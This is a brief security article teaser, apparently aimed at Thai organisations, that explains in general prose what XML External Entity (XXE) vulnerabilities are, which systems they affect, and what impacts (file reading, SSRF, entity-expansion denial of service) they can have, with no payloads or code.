XML External Entity (XXE) vulnerabilities exploit XML parsers that process external entity references in XML input. A successful XXE attack can read arbitrary files from the server (including configuration files and credentials), perform server-side request forgery (accessing internal services), execute denial-of-service attacks (through recursive entity expansion — the 'billion laughs' attack), and in some cases achieve remote code execution. XXE is particularly relevant in enterprise applications that process XML for data exchange, SOAP web services, document upload and processing, and legacy integration endpoints. Testing involves submitting crafted XML payloads with external entity declarations to every XML processing endpoint and evaluating whether the parser resolves them.
Technical2026-10-14
XML External Entity (XXE) Attacks: Server-Side File Reading and SSRF สำหรับองค์กรไทย
XXE vulnerabilities in XML parsers can expose server files, enable SSRF, and cause denial of service. Guidance for TH market.